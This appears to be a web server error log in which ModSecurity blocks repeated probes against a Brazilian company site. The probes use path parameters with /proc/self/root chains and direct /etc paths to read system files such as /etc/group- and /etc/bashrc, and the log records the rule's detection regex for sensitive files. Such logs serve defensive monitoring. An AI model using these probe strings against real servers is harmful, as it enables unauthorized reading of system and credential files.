[Fri Mar 20 09:52:28.742611 2026] [:error] [pid 11167:tid 140411733534464] [client 74.7.243.128:49080] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1DDPHIg5MgXLBnicMOmgAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:52:30.072900 2026] [:error] [pid 9818:tid 140411582465792] [client 74.7.243.128:37352] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1DDl1pVZ5mVmJwsFNH7AAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:52:31.445033 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.243.128:37368] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1DDzJ3M9BSuKP7CAY4jQAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:52:32.767095 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:37378] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1DENa6ubjKNq_cu4bwvAAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:52:35.450315 2026] [:error] [pid 21219:tid 140411733534464] [client 74.7.243.128:37382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1DEvXLqtnMIWvjpaKxYAAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:52:37.451471 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:37388] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1DFda6ubjKNq_cu4bwvQAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:52:37.461967 2026] [mime_magic:error] [pid 26799:tid 140411666392832] (70014)End of file found: [client 74.7.243.128:37388] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:52:41.376509 2026] [:error] [pid 7235:tid 140411574073088] [client 74.7.243.128:37404] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1DGfqxLDW4GITHUkQAbQAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:53:16.959303 2026] [:error] [pid 9818:tid 140411565680384] [client 57.141.18.16:35108] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab1DPF1pVZ5mVmJwsFNICQAAAFU"]
[Fri Mar 20 09:53:29.961055 2026] [mime_magic:error] [pid 9818:tid 140411674785536] (70014)End of file found: [client 57.141.18.58:35554] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:53:33.345806 2026] [mime_magic:error] [pid 31215:tid 140411632822016] (70014)End of file found: [client 57.141.18.57:35670] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:54:00.478393 2026] [:error] [pid 9818:tid 140411649607424] [client 74.7.228.61:54832] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1DaF1pVZ5mVmJwsFNIKAAAAEs"]
[Fri Mar 20 09:54:17.383952 2026] [:error] [pid 21219:tid 140411683178240] [client 74.7.243.128:34968] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1DefXLqtnMIWvjpaKx2QAAAoc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Fri Mar 20 09:56:24.752543 2026] [mime_magic:error] [pid 7893:tid 140411574073088] (70014)End of file found: [client 57.141.18.3:41704] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:56:49.326187 2026] [mime_magic:error] [pid 7235:tid 140411599251200] (70014)End of file found: [client 216.73.216.191:42590] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:58:34.554363 2026] [:error] [pid 7893:tid 140411590858496] [client 57.141.18.14:45960] [client 57.141.18.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1EehCii7xarUs8iHaA0gAAAhI"]
[Fri Mar 20 09:58:34.932365 2026] [:error] [pid 7235:tid 140411624429312] [client 57.141.18.16:46014] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1EevqxLDW4GITHUkQBZAAAAQ4"]
[Fri Mar 20 09:58:37.799934 2026] [mime_magic:error] [pid 11167:tid 140411708356352] (70014)End of file found: [client 74.7.241.31:34574] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/bin
[Fri Mar 20 09:59:12.539314 2026] [:error] [pid 10189:tid 140411691570944] [client 57.141.18.80:47016] [client 57.141.18.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1EoDJ3M9BSuKP7CAY5jQAAAIY"]
[Fri Mar 20 09:59:16.153977 2026] [:error] [pid 11642:tid 140411666392832] [client 57.141.18.75:47348] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1EpLninkcc-iUj5Ap2BAAAA4k"]
[Fri Mar 20 09:59:28.939055 2026] [:error] [pid 26799:tid 140411557287680] [client 57.141.18.106:47672] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/networks"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1EsNa6ubjKNq_cu4bxtAAAA1Y"]
[Fri Mar 20 10:00:31.872984 2026] [:error] [pid 11167:tid 140411716749056] [client 57.141.18.81:49676] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dbus-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1E7_HIg5MgXLBnicMP8AAAAcM"]
[Fri Mar 20 10:00:32.159181 2026] [:error] [pid 7235:tid 140411590858496] [client 57.141.18.9:49654] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1E8PqxLDW4GITHUkQBwQAAARI"]
[Fri Mar 20 10:00:46.599033 2026] [:error] [pid 11642:tid 140411574073088] [client 57.141.18.32:50004] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1E_rninkcc-iUj5Ap2OgAAA5Q"]
[Fri Mar 20 10:00:52.927433 2026] [:error] [pid 21219:tid 140411565680384] [client 57.141.18.50:50344] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1FBPXLqtnMIWvjpaKzOAAAApU"]
[Fri Mar 20 10:02:32.268863 2026] [:error] [pid 9818:tid 140411649607424] [client 57.141.18.40:53730] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release-cpe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1FZ11pVZ5mVmJwsFNJfwAAAEs"]
[Fri Mar 20 10:02:36.385914 2026] [:error] [pid 11167:tid 140411674785536] [client 57.141.18.116:53910] [client 57.141.18.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1FbPHIg5MgXLBnicMQMgAAAcg"]
[Fri Mar 20 10:02:50.057796 2026] [mime_magic:error] [pid 11167:tid 140411716749056] (70014)End of file found: [client 57.141.18.10:54282] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:03:38.171001 2026] [:error] [pid 7235:tid 140411548894976] [client 57.141.18.38:55702] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inittab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1FqvqxLDW4GITHUkQCUAAAARc"]
[Fri Mar 20 10:03:41.286496 2026] [:error] [pid 10189:tid 140411691570944] [client 57.141.18.71:55754] [client 57.141.18.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc4.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1FrTJ3M9BSuKP7CAY6swAAAIY"]
[Fri Mar 20 10:03:49.221334 2026] [:error] [pid 7235:tid 140411708356352] [client 57.141.18.13:56084] [client 57.141.18.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1FtfqxLDW4GITHUkQCVwAAAQQ"]
[Fri Mar 20 10:04:11.419649 2026] [:error] [pid 10189:tid 140411741927168] [client 57.141.18.9:56836] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1FyzJ3M9BSuKP7CAY7CgAAAIA"]
